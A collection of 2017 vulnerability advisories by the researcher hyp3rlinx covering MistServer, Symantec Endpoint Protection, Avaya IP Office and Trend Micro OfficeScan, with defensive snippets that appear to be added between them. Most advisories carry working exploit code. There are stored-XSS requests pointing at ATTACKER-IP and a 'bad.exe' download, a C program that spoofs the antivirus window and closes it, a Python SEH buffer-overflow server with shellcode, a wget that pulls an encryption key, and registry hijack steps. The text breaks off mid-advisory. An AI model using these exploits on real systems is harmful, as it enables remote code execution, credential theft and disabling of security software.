[+] Source:  
http://hyp3rlinx.altervista.org/advisories/MIST-SERVER-v2.12-UNAUTHENTICATED-PERSISTENT-XSS-CVE-2017-16884.txt
[+] ISR: ApparitionSec



Vendor:
===
mistserver.org



Product:
===
MistServer v2.12


MistServer is a full-featured, next-generation streaming media toolkit
for OTT (internet streaming).



Vulnerability Type:
===
Unauthenticated Persistent XSS



CVE Reference:
==
CVE-2017-16884



Security Issue:
===
Unauthenticated remote attackers can inject persistent XSS payloads by
making failed HTTP authentication requests. Attacker-supplied payloads
get stored in the server logs as failed-authentication alerts.
MistServer echoes the unsanitized payloads back in the MistServer web
interface automatically, because the UI refreshes every few seconds,
thereby executing arbitrary attacker-supplied code.



References:
https://news.mistserver.org/news/78/Stable+release+2.13+now+available%21



Exploit/POC:
=
import requests

#INJECT IFRAME
requests.get('http://VICTIM-IP:4242/admin/api?callback=={"authorize":{"password":"666","username":;http://ATTACKER-IP\'>"}}')

#PUSH MALWARE
requests.get('http://VICTIM-IP:4242/admin/api?callback=={"authorize":{"password":"666","username":;http://ATTACKER-IP/bad.exe\'>"}}')

#EXFIL LOGS
requests.get('http://VICTIM-IP:4242/admin/api?command={"authorize":{"password":"666","username":;alert(document.body.innerHTML)"}}')
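Because the payload only has to reach the failed-authentication log, a defender can catch it at the API boundary rather than in the UI. The following added example (not MistServer's code) parses the JSON authorize document out of admin API request targets shaped like the ones above, flags usernames that carry markup, and shows the rendering-side fix of escaping at output time; the sample request lines are constructed.

```python
import html
import json
import re
from urllib.parse import parse_qs, urlsplit

# Constructed request targets in the shape of the advisory's POC: the
# admin API takes a JSON document in a query parameter, and a failed
# authorize is logged with whatever username it carried.
SAMPLE_REQUESTS = [
    '/admin/api?command={"authorize":{"password":"666","username":"admin"}}',
    '/admin/api?command={"authorize":{"password":"666",'
    '"username":"<iframe src=\'http://ATTACKER-IP\'>"}}',
    '/admin/api?command={"authorize":{"password":"666",'
    '"username":"<script>alert(document.body.innerHTML)</script>"}}',
    '/admin/api?callback=cb&command={"authorize":{"password":"x","username":"bob"}}',
]

# Markup metacharacters, a javascript: scheme, or an event-handler attribute.
MARKUP = re.compile(r'[<>"\']|javascript:|\bon\w+\s*=', re.IGNORECASE)


def authorize_username(target):
    """Return the username from an authorize document found in any query
    parameter of the request target, or None if there is none."""
    query = urlsplit(target).query
    for values in parse_qs(query, keep_blank_values=True).values():
        for value in values:
            try:
                doc = json.loads(value)
            except ValueError:
                continue
            auth = doc.get('authorize') if isinstance(doc, dict) else None
            if isinstance(auth, dict) and isinstance(auth.get('username'), str):
                return auth['username']
    return None


def is_log_injection(target):
    user = authorize_username(target)
    return user is not None and MARKUP.search(user) is not None


def flag_requests(targets):
    """Detection pass over access-log request targets."""
    return [t for t in targets if is_log_injection(t)]


def render_failed_auth(username):
    """Output-side fix: escape the logged username when the web UI renders
    the failed-authentication alert, so stored markup is inert text."""
    return '<li>Failed authentication for user: %s</li>' % html.escape(username, quote=True)
```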



Network Access:
===
Remote




Severity:
=
High



Disclosure Timeline:
=
Vendor Notification:  October 19, 2017
Vendor Acknowledgement : October 20, 2017
Vendor Released Fix : November 30, 2017
December 1, 2017 : Public Disclosure




hyp3rlinx



[FD] Symantec Endpoint Protection (SEP) v12.1 Tamper-protection Bypass CVE-2017-6331

2017-11-14 Thread hyp3rlinx
[+] Credits: John Page a.k.a hyp3rlinx  
[+] Website: hyp3rlinx.altervista.org
[+] Source:  
http://hyp3rlinx.altervista.org/advisories/CVE-2017-6331-SYMANTEC-ENDPOINT-PROTECTION-TAMPER-PROTECTION-BYPASS.txt
[+] ISR: ApparitionSec



Vendor:
===
www.symantec.com



Product:
===
Symantec Endpoint Protection
v12.1.6 (12.1 RU6 MP5)
Symantec 12.1.7004.6500



Vulnerability Type:
===
Tamper-Protection Bypass
Denial Of Service / Message Spoof



CVE Reference:
==
CVE-2017-6331
SSG16-041



Security Issue:
===
Symantec Endpoint Protection (SEP) does not validate where WinAPI
messages come from (lack of UIPI). Therefore, malware can easily spoof
messages to the UI or send WM_SYSCOMMAND to close the SEP UI, denying
the end user the ability to scan or run the EP antivirus protection.
Spoofed messages could also potentially inform a user that a scan was
clean.

Unfortunately, Symantec's advisory left out details of the denial of
service, as well as minimizing the amount of text malware could inject
into the UI, which would compromise the integrity of the Symantec
Endpoint Protection control panel user interface.


References:
===
https://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory=security_advisory==20171106_00



Exploit/POC:
=

1) Compile the C program below; it targets various components of SEP.
Comment out whatever you do not want sent to the UI.

2) Try to open the Symantec Endpoint UI and you will be denied.
3) Or inject attacker-supplied messages instructing the user that the
file is clean, etc.


#include <windows.h>
#include <unistd.h>   // sleep() under MinGW; with MSVC use Sleep(1000) from windows.h instead
#define VICTIM "DevViewer.exe"

//By HYP3RLINX
//ISR: ApparitionSec
//Symantec EP Protection - Tamper Protection Bypass Vulnerability
//Tested successfully on Symantec 12.1.6 (12.1 RU6 MP5) build 7004 Symantec 12.1.7004.6500 Windows 7
//How: FindWindow / SendMessage Win32 API
//Impact: DOS / Integrity Compromised
//TO-DO: Get Window text for SavUI.exe and DOS to prevent AV scans.

int main(void){

   while(1){

   //Locate the SEP status window by its title bar text.
   HWND hWnd = FindWindow( NULL, TEXT("Status - Symantec Endpoint Protection"));

   if(hWnd!=NULL){
     //This injects arbitrary messages to SEP UI.
     SetWindowText(hWnd, TEXT("*** Important Security Update, Visit: http://PWN3D.com/EVIL.exe download and follow instructions. ***"));
     //This prevents a user from being able to run AV scans and renders SEP UI useless
     //SendMessage(hWnd, WM_SYSCOMMAND, SC_CLOSE, 0);
   }

   //HWND savUI = FindWindowEx(0, 0, "Symantec Endpoint Protection", 0);

   HWND x = FindWindow(NULL, TEXT("DevViewer"));
   if(x!=NULL){
     SendMessage(x, WM_SYSCOMMAND, SC_CLOSE, 0);
   }

   HWND x2 = FindWindow(NULL, TEXT("DoScan Help"));
   if(x2!=NULL){
     SendMessage(x2, WM_SYSCOMMAND, SC_CLOSE, 0);
   }

   HWND x3 = FindWindow(NULL, TEXT("Sylink Drop"));
   if(x3!=NULL){
     SendMessage(x3, WM_SYSCOMMAND, SC_CLOSE, 0);
   }

   HWND x4 = FindWindow(NULL, TEXT("Manual Scan started on 7/8/2016"));
   if(x4!=NULL){
     SendMessage(x4, WM_SYSCOMMAND, SC_CLOSE, 0);
   }

   sleep(1);

   }
   return 0;
}


Network Access:
===
Local




Severity:
=
Medium



Disclosure Timeline:
=
Vendor Notification: July 8, 2016
Vendor acknowledged: 7/14/16
Vendor advisory : November 6, 2017
November 10, 2017  : Public Disclosure




hyp3rlinx



[FD] CVE-2017-12969 Avaya OfficeScan IPO Remote ActiveX Buffer Overflow

2017-11-05 Thread hyp3rlinx
[+] Credits: John Page (aka hyp3rlinx)  
[+] Website: hyp3rlinx.altervista.org
[+] Source:  
http://hyp3rlinx.altervista.org/advisories/AVAYA-OFFICE-IP-(IPO)-v9.1.0-10.1-SOFT-CONSOLE-REMOTE-BUFFER-OVERFLOW-0DAY.txt
[+] ISR: apparitionSec



Vendor:
===
www.avaya.com



Product:
===
Avaya IP Office (IPO)
v9.1.0 - 10.1

IP Office is Avaya's global midsize solution for enterprises,
supporting up to 3,000 users at a single location with IP Office
Select editions.
For businesses with multiple locations, IP Office provides a powerful
set of tools to help streamline operations, centralize management, and
reduce total cost of ownership for converged networks. Using industry
standards, IP Office enables companies to share resources, provide
improved customer service, and keep mobile employees accessible.

Provides a hybrid PBX with TDM and IP telephony and trunk support.
Provides IP routing, switching and firewall protection, between LAN
and WAN (LAN2).

In addition to basic telephony services and voicemail, IP Office
offers both hard phone and soft phone options.
Includes a robust set of tools for administration (Manager), call
tracking (SMDR), and system monitoring and diagnostics (System Status
Application).

Available editions: Basic, Essential, Preferred, Server, Server
Select, Server with Virtualized Software, Server/Server Select hosted
in the Cloud.



Vulnerability Type:
===
Remote Buffer Overflow



CVE Reference:
==
CVE-2017-11309
ASA-2017-307



Security Issue:
===
SoftConsole.exe does not check bounds when reading the server response
on making an outbound connection, resulting in a classic buffer
overflow.

An Avaya IP Office user must connect to a malicious server, where a
remote attacker can then deliver the buffer overflow payload in the
server response, exploiting the SoftConsole client. This vulnerability
allows attackers to deliver and execute arbitrary attacker-supplied
code on the Avaya host system.


References:
===
https://downloads.avaya.com/css/P8/documents/101044086


POC Video URL:
==
https://vimeo.com/224679849



Exploit/POC:
=

import struct,socket
#Log data, item 8
# Address=50E083A1
# Message=  0x50e083a1 : pop ecx # pop ebp # ret 0x04 | {PAGE_EXECUTE_READ} [IndyCore190.bpl]
# ASLR: False, Rebase: False, SafeSEH: False, OS: False, v19.0.14356.6604
#(C:\Program Files (x86)\Avaya\IP Office\SoftConsole\IndyCore190.bpl)

#50E083A1  #POP ECX POP EBP RET
'''
No SafeSEH
'''

HOST="127.0.0.1"
PORT=80

#shellcode to call wusa.exe Windows Update Standalone Installer (Tested Win 7)

sc=("\x31\xF6\x56\x64\x8B\x76\x30\x8B\x76\x0C\x8B\x76\x1C\x8B\x6E\x08"
"\x8B\x36\x8B\x5D\x3C\x8B\x5C\x1D\x78\x01\xEB\x8B\x4B\x18\x8B\x7B"
"\x20\x01\xEF\x8B\x7C\x8F\xFC\x01\xEF\x31\xC0\x99\x32\x17\x66\xC1"
"\xCA\x01\xAE\x75\xF7\x66\x81\xFA\x10\xF5\xE0\xE2\x75\xCF\x8B\x53"
"\x24\x01\xEA\x0F\xB7\x14\x4A\x8B\x7B\x1C\x01\xEF\x03\x2C\x97\x68"
"\x2E\x65\x78\x65\x68\x77\x75\x73\x61\x54\x87\x04\x24\x50\xFF\xD5"
"\xCC")


'''
calculated by taking the negative of the number and convert to hex:
in gdb
p/x -1116
$4 = 0xfba4
So now we know that our near jump is going to be \xe9\xa4\xfb\xff\xff.
'''

seh=struct.pack("<L", 0x50E149FD) #POP ECX POP EBP RET
#payload="A"*564+""+"A"*232  #control SEH here

#(gdb) p/x -112
#$1 = 0xff90

negjmp="\xeb\x90\xff\xff"
payload="A"*452+"\x90"*10+sc+"A"*5+negjmp+seh+"\x90"*226


s = socket.socket()
s.bind((HOST, PORT))
s.listen(5)

print 'Avaya IP Office SoftConsole 9.1.0'
print '0day Remote Buffer Overflow Exploit'
print 'Discovery / exploit: hyp3rlinx\n'
print 'Listening on port 80 for Avaya client connectionz...'


while True:
    conn, addr = s.accept()
    conn.send(payload+'\r\n')
    print 'KABOOM!!!'
    conn.close()
s.close()






Network Access:
===
Remote



Severity:
=
High



Disclosure Timeline:
=
Vendor Notification: July 7, 2017
Vendor reply "under investigation" : July 7, 2017
Vendor acknowledgement of issue : July 12, 2017
CVE assigned by mitre: July 13, 2017
Vendor advisory: November 4, 2017
November 5, 2017  : Public Disclosure




[FD] CVE-2017-12969 Avaya OfficeScan IPO Remote ActiveX Buffer Overflow

2017-11-05 Thread hyp3rlinx
[+] Credits: John Page (aka hyp3rlinx)  
[+] Website: hyp3rlinx.altervista.org
[+] Source:  
http://hyp3rlinx.altervista.org/advisories/AVAYA-OFFICE-IP-(IPO)-v9.1.0-10.1-VIEWERCTRL-ACTIVE-X-BUFFER-OVERFLOW-0DAY.txt
[+] ISR: ApparitionSec



Vendor:
===
www.avaya.com



Product:
===
Avaya IP Office (IPO)
v9.1.0 - 10.1

IP Office is Avaya's global midsize solution for enterprises,
supporting up to 3,000 users at a single location with IP Office
Select editions.
For businesses with multiple locations, IP Office provides a powerful
set of tools to help streamline operations, centralize management, and
reduce total cost of ownership for converged networks. Using industry
standards, IP Office enables companies to share resources, provide
improved customer service, and keep mobile employees accessible.

Provides a hybrid PBX with TDM and IP telephony and trunk support.
Provides IP routing, switching and firewall protection, between LAN
and WAN (LAN2).

In addition to basic telephony services and voicemail, IP Office
offers both hard phone and soft phone options.
Includes a robust set of tools for administration (Manager), call
tracking (SMDR), and system monitoring and diagnostics (System Status
Application).

Available editions: Basic, Essential, Preferred, Server, Server
Select, Server with Virtualized Software, Server/Server Select hosted
in the Cloud.



Vulnerability Type:
===
ActiveX Remote Buffer Overflow




CVE Reference:
==
CVE-2017-12969
ASA-2017-313



Security Issue:
===
ViewerCtrl.ocx, an ActiveX component used by Avaya IP Office (IPO), can
be exploited by remote attackers to potentially execute arbitrary
attacker-supplied code. A user would have to visit a malicious webpage
using Internet Explorer, where the exploit could be triggered.

Clsid: {27F12EFD-325D-4907-A2D2-C38A2B6D3334}
Safe for Script: False
Safe for Init: False

ACCESS_VIOLATION
8C4A77 MOV EAX,[ECX]

SEH Chain:
---
1 8D00A3 po.dll
2 36A7E95 CIPElements.dll
3 36A8115 CIPElements.dll
4 788719 ViewerCtrl.OCX
5 788533 ViewerCtrl.OCX
6 78862A ViewerCtrl.OCX
7 6008793E mfc90u.dll
8 60089B31 mfc90u.dll
9 779858C5 ntdll.dll


(d360.1040c): Access violation - code c005 (first/second chance
not available)
*** ERROR: Symbol file could not be found.  Defaulted to export
symbols for ntdll.dll -
*** ERROR: Symbol file could not be found.  Defaulted to export
symbols for po.dll -
*** ERROR: Symbol file could not be found.  Defaulted to export
symbols for CIPElements.dll -
eax=0608ec18 ebx= ecx= edx= esi=0aa7bdd0 edi=0aa7bdd0
eip=06064a77 esp=03535c78 ebp=03535db0 iopl=0 nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b efl=00210246
po!cip::po::SpecialObjects::getPresetObject+0x77:
06064a77 8b01mov eax,dword ptr [ecx]  ds:002b:=
0:008> !load winext/msec
0:008> !exploitable

!exploitable 1.6.0.0
*** ERROR: Module load completed but symbols could not be loaded for mfc90u.dll
*** ERROR: Symbol file could not be found.  Defaulted to export
symbols for mshtml.dll -
*** ERROR: Symbol file could not be found.  Defaulted to export
symbols for user32.dll -
*** ERROR: Symbol file could not be found.  Defaulted to export
symbols for ieframe.dll -
*** ERROR: Symbol file could not be found.  Defaulted to export
symbols for iertutil.dll -
*** ERROR: Symbol file could not be found.  Defaulted to export
symbols for IEShims.dll -
*** ERROR: Symbol file could not be found.  Defaulted to export
symbols for kernel32.dll -

Exploitability Classification: PROBABLY_EXPLOITABLE

Recommended Bug Title: Probably Exploitable - Data from Faulting
Address controls Code Flow starting at
po!cip::po::SpecialObjects::getPresetObject+0x0077
(Hash=0x6f1f914b.0xc46b7285)

The data from the faulting address is later used as the target for a branch.


References:
===
https://downloads.avaya.com/css/P8/documents/101044091


Exploit/POC:
=




victimFile = "C:\Program Files (x86)\Avaya\IP Office Contact Center\User Interface\ViewerCtrl.ocx"
prototype  = "Function open ( ByVal containerId As String ) As Long"
memberName = "open"
progid = "ViewerCtrlLib.ViewerCtrl"
argCount   = 1
payload=String(5142, "A")

victim.open payload
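Until the vendor fix is rolled out, the standard mitigation for a control like this is the Internet Explorer kill bit on its CLSID. The following added example (not Avaya's code) renders a .reg file that sets Compatibility Flags 0x400 for the advisory's CLSID under both the native and Wow6432Node ActiveX Compatibility keys while preserving any flags already set; the current flag value is a parameter you supply.

```python
import re

# Shape of a Windows CLSID in registry notation, braces included.
CLSID_RE = re.compile(r'^\{[0-9A-F]{8}(?:-[0-9A-F]{4}){3}-[0-9A-F]{12}\}$',
                      re.IGNORECASE)

# "Compatibility Flags" bit that tells Internet Explorer never to load the control.
KILL_BIT = 0x00000400

# 32-bit IE on 64-bit Windows reads the Wow6432Node view, so set both.
COMPAT_KEYS = (
    r'HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility',
    r'HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility',
)

# CLSID of ViewerCtrl.ocx as given in the advisory.
VIEWERCTRL_CLSID = '{27F12EFD-325D-4907-A2D2-C38A2B6D3334}'


def has_kill_bit(flags):
    return bool(flags & KILL_BIT)


def with_kill_bit(existing_flags):
    """OR the kill bit onto the current value so that other compatibility
    bits already set for the control are not wiped."""
    return existing_flags | KILL_BIT


def kill_bit_reg(clsid, existing_flags=0):
    """Render a .reg file (import with: regedit /s file.reg) that sets the
    kill bit for clsid under both ActiveX Compatibility keys."""
    if not CLSID_RE.match(clsid):
        raise ValueError('malformed CLSID: %r' % clsid)
    clsid = clsid.upper()
    value = with_kill_bit(existing_flags)
    lines = ['Windows Registry Editor Version 5.00', '']
    for key in COMPAT_KEYS:
        lines.append('[%s\\%s]' % (key, clsid))
        lines.append('"Compatibility Flags"=dword:%08x' % value)
        lines.append('')
    return '\n'.join(lines)
```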




Network Access:
===
Remote




Severity:
=
High



Disclosure Timeline:
=
Vendor Notification:  July 12, 2017
Vendor acknowlegement: July 14, 2017
CVE assigned by mitre : August 19, 2017
Vendor advisory : November 4, 2017
November 5, 2017 : Public Disclosure




[FD] Trend Micro OfficeScan v11.0 and XG (12.0)* Unauthorized Remote Memory Corruption CVE-2017-14089

2017-09-29 Thread hyp3rlinx
[+] Credits: John Page (aka hyp3rlinx)  
[+] Website: hyp3rlinx.altervista.org
[+] Source:  
http://hyp3rlinx.altervista.org/advisories/CVE-2017-14089-TRENDMICRO-OFFICESCAN-XG-PRE-AUTH-REMOTE-MEMORY-CORRUPTION.txt
[+] ISR: ApparitionSec



Vendor:
===
www.trendmicro.com



Product:
===
OfficeScan
v11.0 and XG (12.0)*


OfficeScan protects enterprise networks from malware, network viruses,
web-based threats, spyware, and mixed threat attacks.
An integrated solution, OfficeScan consists of the OfficeScan agent
program that resides at the endpoint and a server program that
manages all agents. The OfficeScan agent guards the endpoint and
reports its security status to the server. The server, through the
web-based management console, makes it easy to set coordinated
security policies and deploy updates to every agent.


Vulnerability Type:
===
Unauthorized Remote Memory Corruption



CVE Reference:
==
CVE-2017-14089



Security Issue:
===
Remote unauthenticated attackers that can make a connection to the
TrendMicro OfficeScan XG application, targeting the
"cgiShowClientAdm.exe" process, can cause memory corruption issues.


References:
===
https://success.trendmicro.com/solution/1118372



Exploit/POC:
=
import urllib,urllib2
from urllib2 import Request

print 'TrendMicro OfficeScan XG'
print 'Stack Memory Corruption POC'
print 'by hyp3rlinx\n'

IP="VICTIM-IP:4343"

PAYLOAD="A"*256

url = urllib2.Request('https://'+IP+'/officescan/console/html/cgi/cgiShowClientAdm.exe')

#Cookie header value sent with the request (one string, split over lines for readability)
cookie=("Cookie: serror=0; session_expired=no; "
        "FeatureEnableState=enableAntiBody@1|enableCCFR@1|enableCfw@1|enableDcs@1|enableSorting@0|enableSpy@1|enableVirus@1|HasAvAddSvc@1|installWSS@1|enableDLP@0|sqldbMode@0|enableIPv6@1|w2ksupport@0|; "
        "stamp=2231521137; timestamp=1497360567; DisabledIds=.; "
        "LogonUser=A; "
        "ReadOnlyIds=8.56.; enableRba=1; key=16914202097564; session=666; "
        "LANG=en_US; PHPSESSID=WHATEVER123; lastID=34; lastTab=-1; "
        "theme=default; wf_CSRF_token=; "
        "serror=0; retry=0; PHPSESSID=WHATEVERHERE; wf_CSRF_token=666; "
        "LANG=en_US; theme=default; lastID=33; lastTab=-1")

print '\nsending packetz... \n'+ cookie

##url.add_header("X-CSRFToken", "ee721b62aef83b017e8c86f52e38a411")
#<== X-CSRFToken IS NOT EVEN NEEDED!
url.add_header("Content-Type", "application/x-www-form-urlencoded; charset=utf-8")
url.add_header("Content-Length", "54")
url.add_header("Cookie ",cookie)

#urlopen takes the Request object once and returns the response
res = urllib2.urlopen(url)
print res




Network Access:
===
Remote




Severity:
=
High



Disclosure Timeline:
===
Vendor Notification:  June 5, 2017
Vendor releases fixes / advisory : September 27, 2017
September 28, 2017 : Public Disclosure




hyp3rlinx



[FD] Trend Micro OfficeScan v11.0 and XG (12.0)* Unauthorized Remote Encryption Key Disclosure CVE-2017-14083

2017-09-29 Thread hyp3rlinx
[+] Credits: John Page (aka hyp3rlinx)  
[+] Website: hyp3rlinx.altervista.org
[+] Source:  
http://hyp3rlinx.altervista.org/advisories/CVE-2017-14083-TRENDMICRO-OFFICESCAN-XG-PRE-AUTH-REMOTE-ENCRYPTION-KEY-DISCLOSURE.txt
[+] ISR: ApparitionSec



Vendor:
===
www.trendmicro.com



Product:
===
OfficeScan
v11.0 and XG (12.0)*


OfficeScan protects enterprise networks from malware, network viruses,
web-based threats, spyware, and mixed threat attacks.
An integrated solution, OfficeScan consists of the OfficeScan agent
program that resides at the endpoint and a server program that
manages all agents. The OfficeScan agent guards the endpoint and
reports its security status to the server. The server, through the
web-based management console, makes it easy to set coordinated
security policies and deploy updates to every agent.



Vulnerability Type:
===
Unauthorized Encryption Key Disclosure



CVE Reference:
==
CVE-2017-14083



Security Issue:
===
Remote unauthenticated attackers who can reach the TrendMicro
OfficeScan XG application, which usually runs on port 4343, can download
the OfficeScan XG encryption key file "crypt.key". This crypt.key is
used for the OfficeScan XG encryption process.


References:
===
https://success.trendmicro.com/solution/1118372


e.g.

In "config.php"

/* *
 * Encryption module configurations
 */
$wfconf_wfcrypt_keyfile = dirname(__FILE__) . "/../repository/inc/class/common/crypt/crypt.key";   // <= HERE
$wfconf_wfcrypt_algorithm = MCRYPT_RIJNDAEL_256; // MCRYPT_3DES MCRYPT_BLOWFISH MCRYPT_CAST_256 MCRYPT_DES ...
/* *
 * Framework configurations
 */
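The root cause is that the key path in config.php resolves to a location the web server serves. The following added example (not Trend Micro's code) resolves a dirname(__FILE__)-relative path the way PHP does and reports whether the result lands under the document root, and at which URL; the document root and the directory holding config.php are assumptions.

```python
import posixpath

# Constructed layout assumed from the advisory: the web root, where
# config.php lives, and the key path exactly as written in config.php.
DOCROOT = '/var/www'                                            # assumed
CONFIG_DIR = '/var/www/officescan/console/html/widget/inc'      # assumed dirname(__FILE__)
KEYFILE_REL = '../repository/inc/class/common/crypt/crypt.key'  # from config.php


def resolve_from(config_dir, relative):
    """Mimic PHP's dirname(__FILE__) . "/" . $relative: join, then collapse
    the '..' segments. An absolute $relative wins, as it would in PHP."""
    return posixpath.normpath(posixpath.join(config_dir, relative))


def web_exposed_path(docroot, path):
    """Return the URL path under which `path` would be served if it lies
    inside docroot, otherwise None. The prefix test is done on whole path
    segments so that /var/www2 does not count as inside /var/www."""
    docroot = posixpath.normpath(docroot).rstrip('/')
    path = posixpath.normpath(path)
    if path == docroot or docroot == '':
        return path[len(docroot):] or '/'
    if path.startswith(docroot + '/'):
        return path[len(docroot):]
    return None


def audit_secret_locations(docroot, config_dir, secrets):
    """secrets maps a label to the path string from config.php. Returns the
    labels that resolve inside docroot together with the URL exposing them."""
    exposed = {}
    for label, rel in secrets.items():
        url = web_exposed_path(docroot, resolve_from(config_dir, rel))
        if url is not None:
            exposed[label] = url
    return exposed
```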



Exploit/POC:
=

[root@localhost /]# wget --no-check-certificate
https://VICTIM-IP:4343/officescan/console/html/widget/repository/inc/class/common/crypt/crypt.key
--14:59:52--  
https://VICTIM-IP:4343/officescan/console/html/widget/repository/inc/class/common/crypt/crypt.key
Connecting to VICTIM-IP:4343... connected.
WARNING: cannot verify VICTIM-IP's certificate, issued by `/CN=VICTIM-IP':
  Self-signed certificate encountered.
HTTP request sent, awaiting response... 200 OK
Length: 32 [application/octet-stream]
Saving to: `crypt.key'

100%[==>]
32  --.-K/s   in 0s

14:59:52 (15.3 MB/s) - `crypt.key' saved [32/32]



Network Access:
===
Remote




Severity:
=
High



Disclosure Timeline:
=
Vendor Notification: May 31, 2017
Vendor: "hotfix in progress". June 23, 2017
Vendor releases fixes / advisory : September 27, 2017
September 28, 2017  : Public Disclosure




hyp3rlinx



[FD] Trend Micro OfficeScan v11.0 and XG (12.0)* Unauthorized Change Prevention Image File Execution Bypass

2017-09-29 Thread hyp3rlinx
[+] Credits: John Page (aka hyp3rlinx)  
[+] Website: hyp3rlinx.altervista.org
[+] Source:  
http://hyp3rlinx.altervista.org/advisories/TRENDMICRO-OFFICESCAN-XG-IMAGE-FILE-EXECUTION-BYPASS.txt
[+] ISR: ApparitionSec



Vendor:
===
www.trendmicro.com



Product:
===
OfficeScan
v11.0 and XG (12.0)*


OfficeScan protects enterprise networks from malware, network viruses,
web-based threats, spyware, and mixed threat attacks.
An integrated solution, OfficeScan consists of the OfficeScan agent
program that resides at the endpoint and a server program that
manages all agents. The OfficeScan agent guards the endpoint and
reports its security status to the server. The server, through the
web-based management console, makes it easy to set coordinated
security policies and deploy updates to every agent.


Vulnerability Type:
===
Image File Execution Bypass



CVE Reference:
==
N/A



Security Issue:
===
OfficeScan XG's "Unauthorized Change Prevention Service" is a Local
SYSTEM service that is supposed to protect OfficeScan processes
like "PccNTMon.exe" from being terminated, and also prevents
unauthorized arbitrary registry settings from being made on the
protected machine, even by an Administrator.

However, this can easily be bypassed by exploiting Windows Image File
Execution Options (IFEO) to hijack the service process.
IFEO has been used by malware for some time to prevent a process from
running, or to execute a process of the attacker's choosing in
place of the process the user expects.

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options

All an attacker needs to do is create a registry key in IFEO with the
same name as "TMBMSRV.exe", which is used by the
"Trend Micro Unauthorized Change Prevention Service" SYSTEM service.
After creating this registry key, we create a "string value"
named debugger pointing to, say, "calc.exe"; we wait, and once the
system reboots, BOOM!


References:
===
https://success.trendmicro.com/solution/1118372



Exploit/POC:
=

Reproduction:

1) Open registry

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options

2) Create a new Key with no name

3) Create a new string value under the new key named "debugger" with
value of c:\Windows\system32\calc.exe

4) Rename the created key to TMBMSRV.exe

5) Reboot system

Done!

We can then not only kill TM but also write to the TrendMicro whitelist
key in the registry so that our evil binary is left alone in peace.
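The defensive counterpart to the steps above is a periodic audit of IFEO for Debugger values on security-product binaries. The following added example (not Trend Micro's code) parses a reg.exe export of the IFEO key, lists every image that has a Debugger redirect, and flags the ones that belong to OfficeScan; the export text is constructed.

```python
import re

# OfficeScan processes named in the advisory whose IFEO hijack would
# disable the Unauthorized Change Prevention Service or its monitor.
PROTECTED_IMAGES = {'tmbmsrv.exe', 'pccntmon.exe'}

# Constructed sample of:
#   reg export "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options" ifeo.reg
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe]
"DisableExceptionChainValidation"=dword:00000000

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\TMBMSRV.exe]
"Debugger"="c:\\Windows\\system32\\calc.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\devenv.exe]
"Debugger"="vsjitdebugger.exe"
'''

IFEO_KEY = '\\Image File Execution Options\\'
SECTION = re.compile(r'^\[(.+)\]$')
STRING_VALUE = re.compile(r'^"([^"]+)"="(.*)"$')


def parse_reg(text):
    """Parse the subset of .reg syntax reg.exe exports: [key] headers and
    "name"="string" values (other value types are skipped).
    Returns {key_path: {value_name: value}}."""
    keys, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        m = SECTION.match(line)
        if m:
            current = m.group(1)
            keys[current] = {}
            continue
        m = STRING_VALUE.match(line)
        if m and current is not None:
            # .reg files double every backslash inside string values
            keys[current][m.group(1)] = m.group(2).replace('\\\\', '\\')
    return keys


def ifeo_debuggers(text):
    """Return {image_name: debugger_command} for every direct IFEO subkey
    that carries a Debugger value."""
    found = {}
    for key, values in parse_reg(text).items():
        idx = key.find(IFEO_KEY)
        if idx == -1:
            continue
        image = key[idx + len(IFEO_KEY):]
        if '\\' in image:
            continue  # nested subkeys (PerfOptions etc.) are not image names
        if 'Debugger' in values:
            found[image] = values['Debugger']
    return found


def hijacked_protected_images(text):
    """The alert condition: a Debugger redirect on a protected binary."""
    return {img: dbg for img, dbg in ifeo_debuggers(text).items()
            if img.lower() in PROTECTED_IMAGES}
```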



Network Access:
===
Local



Severity:
=
High



Disclosure Timeline:
=
Vendor Notification: June 28, 2017
Vendor Reply: "Officescan Build 1222 which is affected by this bug was
already pulled and is no longer available for public download"
Vendor Reply: "created hotfixes for product improvement."
September 28, 2017 : Public Disclosure




hyp3rlinx



[FD] Trend Micro OfficeScan v11.0 and XG (12.0)* CURL (MITM) Remote Code Execution CVE-2017-14084

2017-09-29 Thread hyp3rlinx
[+] Credits: John Page (aka hyp3rlinx)  
[+] Website: hyp3rlinx.altervista.org
[+] Source:  
http://hyp3rlinx.altervista.org/advisories/CVE-2017-14084-TRENDMICRO-OFFICESCAN-XG-CURL-MITM-REMOTE-CODE-EXECUTION.txt
[+] ISR: ApparitionSec



Vendor:
===
www.trendmicro.com



Product:
===
OfficeScan
v11.0 and XG (12.0)*


OfficeScan protects enterprise networks from malware, network viruses,
web-based threats, spyware, and mixed threat attacks.
An integrated solution, OfficeScan consists of the OfficeScan agent
program that resides at the endpoint and a server program that
manages all agents. The OfficeScan agent guards the endpoint and
reports its security status to the server. The server, through the
web-based management console, makes it easy to set coordinated
security policies and deploy updates to every agent.



Vulnerability Type:
===
Man-in-the-Middle (MITM) Remote Code Execution



CVE Reference:
==
CVE-2017-14084



Security Issue:
===
A MITM vector exists because the cURL request used by the Send()
function in "HttpTalk.php" has both CURLOPT_SSL_VERIFYPEER and
CURLOPT_SSL_VERIFYHOST set to false.
CURLOPT_SSL_VERIFYPEER checks that the remote certificate is valid,
that it was issued by a CA you trust, and that it is genuine.
CURLOPT_SSL_VERIFYHOST checks that the cert was issued to the entity
you want to talk to.


References:
===
https://success.trendmicro.com/solution/1118372


Vulnerable code snippet...

